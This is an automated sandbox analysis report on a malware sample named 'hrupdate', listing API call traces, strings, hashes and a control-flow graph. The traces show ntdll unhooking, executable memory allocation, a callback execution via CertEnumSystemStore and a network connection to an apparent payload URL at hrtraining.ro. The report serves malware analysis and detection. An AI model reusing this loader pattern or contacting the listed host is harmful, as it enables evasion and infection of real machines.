                                      • ?_Throw_C_error@std@@YAXH@Z.MSVCP140(00000000), ref: 00671220
                                      • _Mtx_destroy.MSVCP140(?), ref: 00671228
                                      • _Cnd_destroy.MSVCP140(?), ref: 00671234
                                      • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0067124A
                                      • ?_Throw_Cpp_error@std@@YAXH@Z.MSVCP140(00000001), ref: 00671270
                                      • _Thrd_detach.MSVCP140(?,?), ref: 0067127F
                                      • ?_Throw_C_error@std@@YAXH@Z.MSVCP140(00000000), ref: 0067128D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3896617863.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                      • Associated: 00000000.00000002.3896582194.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3896648026.0000000000674000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3896669818.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3896684082.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3896684082.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_670000_hrupdate.jbxd
                                      Similarity
                                      • API ID: Throw_$C_error@std@@$Cnd_destroyCnd_initCnd_waitCpp_error@std@@Mtx_destroyMtx_initMtx_lockMtx_unlockThrd_detachThrd_startmallocterminate
                                      • String ID: $Dg
                                      • API String ID: 3376608752-2277919188
                                      • Opcode ID: f7b93b563e9b5c4baf9f8613cb922d84925923e5c8017ac90e9fdcdbfd38379d
                                      • Instruction ID: ba8a7c56d54c310cee94f87129e9d727f13bbd6da6f7c25c21f17cd9331e00f9
                                      • Opcode Fuzzy Hash: f7b93b563e9b5c4baf9f8613cb922d84925923e5c8017ac90e9fdcdbfd38379d
                                      • Instruction Fuzzy Hash: 626160B0D00248AFDF10CBA8DD497DEBBF5BF05304F14412AE909A6351EB75AA54CBA2
                                      Function 00672BC0 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 102memorynetworkencryptionCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 00671B30: GetCurrentProcess.KERNEL32 ref: 00671B47
                                        • Part of subcall function 00671B30: GetModuleHandleA.KERNEL32 ref: 00671B62
                                        • Part of subcall function 00671B30: K32GetModuleInformation.KERNEL32(00000000,00000000,?,0000000C), ref: 00671B73
                                        • Part of subcall function 00671B30: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00671B8F
                                        • Part of subcall function 00671B30: CreateFileMappingW.KERNELBASE(00000000,00000000,01000002,00000000,00000000,00000000,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00671BA6
                                        • Part of subcall function 00671B30: MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00671BB8
                                        • Part of subcall function 00671B30: VirtualProtect.KERNEL32(?,?,00000040,?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00671C2C
                                        • Part of subcall function 00671B30: memcpy.VCRUNTIME140(?,?,?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00671C43
                                        • Part of subcall function 00671B30: VirtualProtect.KERNEL32(?,?,?,?), ref: 00671C5C
                                        • Part of subcall function 00671B30: CloseHandle.KERNEL32(?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00671C76
                                        • Part of subcall function 00671B30: CloseHandle.KERNEL32(?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00671C7B
                                        • Part of subcall function 00671B30: CloseHandle.KERNEL32(?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00671C80
                                        • Part of subcall function 00671B30: FreeLibrary.KERNEL32(?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00671C85
                                      • GetConsoleWindow.KERNEL32(00000000), ref: 00672CCA
                                      • ShowWindow.USER32(00000000), ref: 00672CD1
                                      • WSAStartup.WS2_32 ref: 00672D32
                                        • Part of subcall function 00672180: socket.WS2_32(00000002,00000001,00000006), ref: 00672259
                                        • Part of subcall function 00672180: inet_addr.WS2_32(00000000), ref: 00672273
                                        • Part of subcall function 00672180: gethostbyname.WS2_32(00000000), ref: 0067227B
                                        • Part of subcall function 00672180: htons.WS2_32(00000050), ref: 006722BB
                                        • Part of subcall function 00672180: connect.WS2_32(00000000,?,00000010), ref: 006722D2
                                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 00672D60
                                      • memcpy.VCRUNTIME140(00000000,00000000,?), ref: 00672D6D
                                      • CertEnumSystemStore.CRYPT32(00010000,00000000,00000000,?), ref: 00672D83
                                      • FlsAlloc.KERNEL32(?), ref: 00672D8A
                                      • FlsSetValue.KERNEL32(00000000,?), ref: 00672D9E
                                      • WSACleanup.WS2_32 ref: 00672DA4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3896617863.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                      • Associated: 00000000.00000002.3896582194.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3896648026.0000000000674000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3896669818.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3896684082.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3896684082.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_670000_hrupdate.jbxd
                                      Similarity
                                      • API ID: Handle$CloseFileVirtual$AllocCreateModuleProtectWindowmemcpy$CertCleanupConsoleCurrentEnumFreeInformationLibraryMappingProcessShowStartupStoreSystemValueViewconnectgethostbynamehtonsinet_addrsocket
                                      • String ID: c:\windows\system32\kernel32.dll$c:\windows\system32\ntdll.dll$dummy$http://www.hrtraining.ro/trainingcheck_v5498$kernel32.dll$ntdll.dll
                                      • API String ID: 3600704002-5958019
                                      • Opcode ID: 4992d9913989be341c631ddc213340972d96a96504dd33e1cc5cd2984d2d9d8b
                                      • Instruction ID: 5a1791fac195d9107dfb8608a8d9cc81be09367076f73cbaf7bd049164928eb1
                                      • Opcode Fuzzy Hash: 4992d9913989be341c631ddc213340972d96a96504dd33e1cc5cd2984d2d9d8b
                                      • Instruction Fuzzy Hash: 41415E308487858AD725DB65DC49BEABBE5FBA9314F00660DE98C521A2EF7062C4CB52
                                      Function 00671B30 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 131filememoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • GetCurrentProcess.KERNEL32 ref: 00671B47
                                      • GetModuleHandleA.KERNEL32 ref: 00671B62
                                      • K32GetModuleInformation.KERNEL32(00000000,00000000,?,0000000C), ref: 00671B73
                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00671B8F
                                      • CreateFileMappingW.KERNELBASE(00000000,00000000,01000002,00000000,00000000,00000000,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00671BA6
                                      • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00671BB8
                                      • VirtualProtect.KERNEL32(?,?,00000040,?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00671C2C
                                      • memcpy.VCRUNTIME140(?,?,?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00671C43
                                      • VirtualProtect.KERNEL32(?,?,?,?), ref: 00671C5C
                                      • CloseHandle.KERNEL32(?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00671C76
                                      • CloseHandle.KERNEL32(?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00671C7B
                                      • CloseHandle.KERNEL32(?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00671C80
                                      • FreeLibrary.KERNEL32(?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00671C85
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3896617863.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                      • Associated: 00000000.00000002.3896582194.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3896648026.0000000000674000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3896669818.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3896684082.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3896684082.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_670000_hrupdate.jbxd
                                      Similarity
                                      • API ID: Handle$CloseFile$CreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewmemcpy
                                      • String ID: .text
                                      • API String ID: 3896868005-2719751843
                                      • Opcode ID: f37a4f64eb3392ca5b3bc51494ad612fb8df065b0663cd4dfb7bc6ea707f9cc5
                                      • Instruction ID: 6331c957f5f5ad32d97f4e35b40e1683a3828d116040fa733f4f484c68d5b7c6
                                      • Opcode Fuzzy Hash: f37a4f64eb3392ca5b3bc51494ad612fb8df065b0663cd4dfb7bc6ea707f9cc5
                                      • Instruction Fuzzy Hash: 0541A271940208ABDB15CFA4DC89FAEBBB6FF09700F104055F608BB291DB71A950CBA4
                                      Function 0469709E Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 186networkfileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • _memset.LIBCMT ref: 046970DF
                                      • __snprintf.LIBCMT ref: 04697106
                                        • Part of subcall function 0469E3F2: _memset.LIBCMT ref: 0469E413
                                      • __snprintf.LIBCMT ref: 04697182
                                      • __snprintf.LIBCMT ref: 04697199
                                      • HttpOpenRequestA.WININET(00000000,?,00000000,00000000,*/*,046DA668), ref: 046971C8
                                      • HttpSendRequestA.WININET(00000000,?,?,046972C1,?), ref: 046971F1
                                      • InternetCloseHandle.WININET(00000000), ref: 0469720E
                                        • Part of subcall function 0469A9C6: _memset.LIBCMT ref: 0469A9D6
                                        • Part of subcall function 0469A9C6: _memset.LIBCMT ref: 0469A9E2
                                        • Part of subcall function 0469A9C6: __snprintf.LIBCMT ref: 0469AA33
                                        • Part of subcall function 0469A9C6: _memset.LIBCMT ref: 0469AA6A
                                        • Part of subcall function 0469A9C6: _memset.LIBCMT ref: 0469AA75
                                        • Part of subcall function 0469AA90: _memset.LIBCMT ref: 0469AAA0
                                        • Part of subcall function 0469AA90: _memset.LIBCMT ref: 0469AAAC
                                        • Part of subcall function 0469AA90: __snprintf.LIBCMT ref: 0469AB08
                                        • Part of subcall function 0469AA90: _memset.LIBCMT ref: 0469AB26
                                        • Part of subcall function 0469AA90: _memset.LIBCMT ref: 0469AB31
                                      • InternetQueryDataAvailable.WININET(00000000,0469483D,00000000,00000000), ref: 0469721F
                                      • InternetReadFile.WININET(00000000,?,00001000,?), ref: 0469724D
                                      • InternetCloseHandle.WININET(00000000), ref: 0469726D
                                      • InternetCloseHandle.WININET(00000000), ref: 0469728E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _memset$Internet__snprintf$CloseHandle$HttpRequest$AvailableDataFileOpenQueryReadSend
                                      • String ID: %s%s$*/*
                                      • API String ID: 2172916581-856325523
                                      • Opcode ID: 36d1c1b4402e25936ccf7b17038093c7f66753e6c278bad338ed6dfd72cddfbb
                                      • Instruction ID: b663fe8a0c749480132e8f0012ada2e3cd94ea4b44023b9542324d958a943da8
                                      • Opcode Fuzzy Hash: 36d1c1b4402e25936ccf7b17038093c7f66753e6c278bad338ed6dfd72cddfbb
                                      • Instruction Fuzzy Hash: 29519972A00209FFEF11AFA4DC84DFE7BBCEB05315F04446AF615A2250FA75AE548B64
                                      Function 006712C0 Relevance: 18.2, APIs: 12, Instructions: 156COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • _Query_perf_frequency.MSVCP140 ref: 006712F3
                                      • _Query_perf_counter.MSVCP140 ref: 00671305
                                      • __alldvrm.LIBCMT ref: 00671310
                                      • _Query_perf_frequency.MSVCP140(?,00000000), ref: 00671322
                                      • _Query_perf_counter.MSVCP140(?,00000000), ref: 00671330
                                      • __alldvrm.LIBCMT ref: 00671341
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00671399
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006713C0
                                      • _Xtime_get_ticks.MSVCP140(00000000,?,00000000,00000000,00000000,00000000,3B9ACA00,00000000,00000000,?,?,00000000,?,00000000,3B9ACA00,00000000), ref: 006713EA
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0067140C
                                      • _Thrd_sleep.MSVCP140(00000000,00000000,?,3B9ACA00,00000000,00000000,?,00000064,00000000,?,00000000,00000000,00000000,00000000,3B9ACA00,00000000), ref: 00671434
                                      • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 0067146D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3896617863.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                      • Associated: 00000000.00000002.3896582194.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3896648026.0000000000674000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3896669818.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3896684082.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3896684082.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_670000_hrupdate.jbxd
                                      Similarity
                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$Query_perf_counterQuery_perf_frequency__alldvrm$Thrd_sleepXbad_function_call@std@@Xtime_get_ticks
                                      • String ID:
                                      • API String ID: 1496849827-0
                                      • Opcode ID: 0aea90061385e45bd9c66139f29865e6c0f8753463b7fa915279b7e984bf9d84
                                      • Instruction ID: 1a96eb859dd596808d5df60041a984aba08098c930b0da8b2415a4cf6349e263
                                      • Opcode Fuzzy Hash: 0aea90061385e45bd9c66139f29865e6c0f8753463b7fa915279b7e984bf9d84
                                      • Instruction Fuzzy Hash: 52519AB2908350AFD750DF288C45B2BBBFAEFC9754F118A1DF68897221D731D9408B96
                                      Function 046944E1 Relevance: 13.9, APIs: 9, Instructions: 415timeCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 426 46944e1-4694603 call 469cf5f call 469d125 * 3 call 46a120e call 46a11dd call 46a11e8 call 46a120e * 2 call 469d125 * 2 call 46a11dd call 469d125 call 46a11e8 * 3 call 46a11dd call 46a1bb6 call 469a70c call 46a4b98 * 2 call 4697dcf 471 469460a-469461d call 46a11e8 call 4697e12 426->471 472 4694605 call 46a3f47 426->472 478 469461f call 46a3f47 471->478 479 4694624-469462b call 4697e2d 471->479 472->471 478->479 483 469462d call 46a3f47 479->483 484 4694632-4694639 call 4697eeb 479->484 483->484 488 469463b call 46a3f47 484->488 489 4694640-469466e call 46a11dd call 46a11e8 call 46aea1b 484->489 488->489 497 4694670 call 46a3f47 489->497 498 4694675-46946b9 call 46a11e8 call 46a4b98 call 46a11e8 call 469ce03 call 46a11e8 call 46a4ddd 489->498 497->498 512 46946db-46946ff call 46a1866 * 3 498->512 513 46946bb-46946da GetLocalTime call 46a11f3 498->513 522 4694701-4694703 512->522 523 4694705-4694724 GetLocalTime call 46a11f3 512->523 513->512 522->523 524 4694725-4694748 call 46a1866 * 2 522->524 523->524 531 469474a-4694752 524->531 532 4694754-4694773 GetLocalTime call 46a11f3 524->532 531->532 533 4694774-4694785 call 4696b60 call 4699d58 531->533 532->533 540 469478b 533->540 541 469499c-46949aa call 4696b9d call 46a3f47 533->541 542 4694792-46947f5 call 46a1f91 call 46aeb76 * 3 call 469a73c 540->542 557 4694815-4694844 call 4696c3f call 46a11e8 call 469729c 542->557 558 46947f7-46947fc 542->558 570 469486c 557->570 571 4694846-4694853 call 46a0b15 557->571 559 46947ff-4694804 558->559 559->559 561 4694806-4694808 559->561 561->557 563 469480a-4694814 call 469ab4c 561->563 563->557 573 469487a-469487d 570->573 574 469486e-4694872 570->574 577 4694874-4694877 571->577 579 4694855-4694864 call 469f190 571->579 576 4694883-4694899 call 46aec25 call 46a2038 call 469dd89 573->576 578 4694904 573->578 574->576 574->577 594 469489e-46948a8 call 46a11e8 576->594 577->573 580 4694907-4694913 call 4696cc6 call 4697dcf 578->580 579->573 588 4694866-4694868 579->588 595 469491a-469492b call 46a1fc1 580->595 596 4694915 call 46a3f47 580->596 588->573 592 469486a 588->592 592->577 602 46948aa-46948af 594->602 603 46948b1 594->603 604 469492d call 46a3f47 595->604 605 4694932-4694936 595->605 596->595 606 46948b6-46948cd call 469957b call 469c5f5 call 469bb3d call 4697dcf 602->606 603->606 604->605 608 4694938-469494d call 46aec25 call 46a20c1 605->608 609 469494e-4694956 605->609 634 46948cf call 4697424 606->634 635 46948d4-46948db 606->635 608->609 609->541 612 4694958-469495f 609->612 615 469498a call 4699aae 612->615 616 4694961-469496f 612->616 624 469498f-4694996 615->624 620 4694971 call 469747c 616->620 621 4694982 616->621 627 4694976-4694980 620->627 623 4694984-4694986 621->623 623->615 628 4694988 623->628 624->541 629 469478d 624->629 627->623 628->615 629->542 634->635 635->580 637 46948dd-4694902 call 4696cc6 call 4696c3f call 4696db9 635->637 637->580
                                      APIs
                                        • Part of subcall function 0469CF5F: _malloc.LIBCMT ref: 0469CF65
                                        • Part of subcall function 0469CF5F: _malloc.LIBCMT ref: 0469CF75
                                        • Part of subcall function 046A1BB6: __time64.LIBCMT ref: 046A1BC8
                                        • Part of subcall function 046A1BB6: _malloc.LIBCMT ref: 046A1C0F
                                        • Part of subcall function 046A1BB6: _memset.LIBCMT ref: 046A1C1C
                                        • Part of subcall function 046A1BB6: _strtok.LIBCMT ref: 046A1C36
                                        • Part of subcall function 0469A70C: __time64.LIBCMT ref: 0469A71D
                                        • Part of subcall function 046A4B98: _malloc.LIBCMT ref: 046A4BBF
                                        • Part of subcall function 046A4B98: _memset.LIBCMT ref: 046A4BED
                                        • Part of subcall function 046A4B98: _realloc.LIBCMT ref: 046A4BCE
                                      • _malloc.LIBCMT ref: 04694661
                                      • GetLocalTime.KERNEL32(?), ref: 046946BF
                                      • GetLocalTime.KERNEL32(?), ref: 04694758
                                      • __snprintf.LIBCMT ref: 046947AC
                                      • __snprintf.LIBCMT ref: 046947BF
                                      • __snprintf.LIBCMT ref: 046947E0
                                      • __time64.LIBCMT ref: 04694884
                                      • __time64.LIBCMT ref: 04694939
                                      • GetLocalTime.KERNEL32(?), ref: 04694709
                                        • Part of subcall function 046A3F47: Sleep.KERNEL32(000003E8,00000080,00000000,00000000,?,?,046949A6), ref: 046A3FAE
                                        • Part of subcall function 046A3F47: RtlExitUserThread.NTDLL(00000000,00000080,00000000,00000000,?,?,046949A6), ref: 046A3FE7
                                        • Part of subcall function 046A3F47: WaitForSingleObject.KERNEL32(00000000,?,?,046949A6), ref: 046A4003
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _malloc$__time64$LocalTime__snprintf$_memset$ExitObjectSingleSleepThreadUserWait_realloc_strtok
                                      • String ID:
                                      • API String ID: 4021925118-0
                                      • Opcode ID: ec660f420a4f200a0fc240e10b0e6fea5b2003342425b868a8c76b699b96dbe1
                                      • Instruction ID: f403b56c44edf3f7eb4d64ac8d5f5cd27d0ef94c6c1702560313367b0e2d9f5a
                                      • Opcode Fuzzy Hash: ec660f420a4f200a0fc240e10b0e6fea5b2003342425b868a8c76b699b96dbe1
                                      • Instruction Fuzzy Hash: C6D1E272D04614AAFF247BB4DD05BAD77E8EF11718F14041EE900AA2C0FEB9FE518A58
                                      Function 0469CE03 Relevance: 12.1, APIs: 8, Instructions: 124COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • GetACP.KERNEL32(00000080,00000000,00000000,?,?,?,?,?,?,?,?,0469469C,00000000,00000000), ref: 0469CE0C
                                      • GetOEMCP.KERNEL32(?,?,?,?,?,?,?,?,0469469C,00000000,00000000), ref: 0469CE18
                                      • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0469469C,00000000), ref: 0469CE45
                                      • GetTickCount.KERNEL32 ref: 0469CE49
                                        • Part of subcall function 046AEFA9: __getptd.LIBCMT ref: 046AEFAE
                                      • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0469469C,00000000), ref: 0469CE76
                                      • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,0469469C,00000000), ref: 0469CEDC
                                      • _memset.LIBCMT ref: 0469CF13
                                      • _memset.LIBCMT ref: 0469CF52
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CurrentProcess$_memset$CountTick__getptd
                                      • String ID:
                                      • API String ID: 3908538216-0
                                      • Opcode ID: 2007370adba29a340545ea1c45331d81f34169019f1bee4b2d970a4aa3439bd1
                                      • Instruction ID: f0562555e1e36c359e704b702ad15f83401b9ddbd2355fc0148e72dd2bf221c3
                                      • Opcode Fuzzy Hash: 2007370adba29a340545ea1c45331d81f34169019f1bee4b2d970a4aa3439bd1
                                      • Instruction Fuzzy Hash: 9631A7728003086AFF10BBB4EC49ADE3BACDF04258F14406AF505EB181FEB9ED548669
                                      Function 00671A20 Relevance: 12.1, APIs: 8, Instructions: 74timewindowCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • GetDlgItem.USER32(?,000003E8), ref: 00671A52
                                      • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 00671A64
                                      • KillTimer.USER32(?,00000001), ref: 00671A72
                                      • KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 00671A7B
                                      • DialogBoxParamW.USER32(00000081,?,00671B00,00000000), ref: 00671A94
                                      • SetTimer.USER32(?,00000001,000003E8,00000000), ref: 00671ACE
                                      • EndDialog.USER32(?,00000000), ref: 00671AE4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3896617863.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                      • Associated: 00000000.00000002.3896582194.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3896648026.0000000000674000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3896669818.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3896684082.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3896684082.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_670000_hrupdate.jbxd
                                      Similarity
                                      • API ID: DialogTimer$CallbackDispatcherItemKillMessageParamSendUser
                                      • String ID:
                                      • API String ID: 182125530-0
                                      • Opcode ID: 59829460a26950b88ddc6779c8303e42671a105a08222060b0311952ee9d5427
                                      • Instruction ID: ced6c8c9a6b68e16a525df826d5d6fd3b3fd5d0b65a0e6c326392ef0875cff41
                                      • Opcode Fuzzy Hash: 59829460a26950b88ddc6779c8303e42671a105a08222060b0311952ee9d5427
                                      • Instruction Fuzzy Hash: FC118E3339020467E7145B5CEC0DFDA7B1ADB65B22F008022F709E90E1DBE1A8D29658
                                      Function 00671900 Relevance: 10.6, APIs: 7, Instructions: 97windowCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • DefWindowProcW.USER32(?,?,?,?), ref: 0067193E
                                      • DefWindowProcW.USER32(?,00000111,?,?), ref: 00671970
                                      • BeginPaint.USER32(?,?), ref: 006719D3
                                      • EndPaint.USER32(?,?), ref: 006719DF
                                      • PostQuitMessage.USER32(00000000), ref: 006719FB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3896617863.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                      • Associated: 00000000.00000002.3896582194.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3896648026.0000000000674000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3896669818.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3896684082.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3896684082.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_670000_hrupdate.jbxd
                                      Similarity
                                      • API ID: PaintProcWindow$BeginMessagePostQuit
                                      • String ID:
                                      • API String ID: 3181456275-0
                                      • Opcode ID: f6018c1e960eeaf8385a6c1b24fcf489b0c707f131cff48e9847eea00bd0d50f
                                      • Instruction ID: 0ba000b463e3170a7db309d8c4339b799e694b9e476bb3d9143211ef55e06f46
                                      • Opcode Fuzzy Hash: f6018c1e960eeaf8385a6c1b24fcf489b0c707f131cff48e9847eea00bd0d50f
                                      • Instruction Fuzzy Hash: F521A7312141099BC724EF68DC2AAFA779ADF4E311F40450AF94AD6291DF619860C7D6
                                      Function 00672B00 Relevance: 10.6, APIs: 7, Instructions: 62COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • _Mtx_lock.MSVCP140(?,A92820B5,?,?,?,?,00673EB0,000000FF), ref: 00672B3B
                                      • ?_Throw_C_error@std@@YAXH@Z.MSVCP140(00000000), ref: 00672B4F
                                      • _Cnd_signal.MSVCP140 ref: 00672B5B
                                      • ?_Throw_C_error@std@@YAXH@Z.MSVCP140(00000000,00000000), ref: 00672B69
                                      • _Mtx_unlock.MSVCP140(00000000,00000000), ref: 00672B71
                                      • ?_Throw_C_error@std@@YAXH@Z.MSVCP140(00000000), ref: 00672B7F
                                      • _Cnd_do_broadcast_at_thread_exit.MSVCP140 ref: 00672B8B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3896617863.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                      • Associated: 00000000.00000002.3896582194.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3896648026.0000000000674000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3896669818.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3896684082.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3896684082.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_670000_hrupdate.jbxd
                                      Similarity
                                      • API ID: C_error@std@@Throw_$Cnd_do_broadcast_at_thread_exitCnd_signalMtx_lockMtx_unlock
                                      • String ID:
                                      • API String ID: 35399794-0
                                      • Opcode ID: 09e0854a1c2a98200039bd963849e3d5266268137b4b8b1609d6607d087cb959
                                      • Instruction ID: 0d203c72ab39a7303360288dc674185af27bacade0f717779cd77d860e5d3bf2
                                      • Opcode Fuzzy Hash: 09e0854a1c2a98200039bd963849e3d5266268137b4b8b1609d6607d087cb959
                                      • Instruction Fuzzy Hash: BE11C4B1900605EBD7045F65EC05F4AB7AAFF00724F044235ED1D93350DB39E968C6EA
                                      Function 0469DC39 Relevance: 9.1, APIs: 6, Instructions: 113networkCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
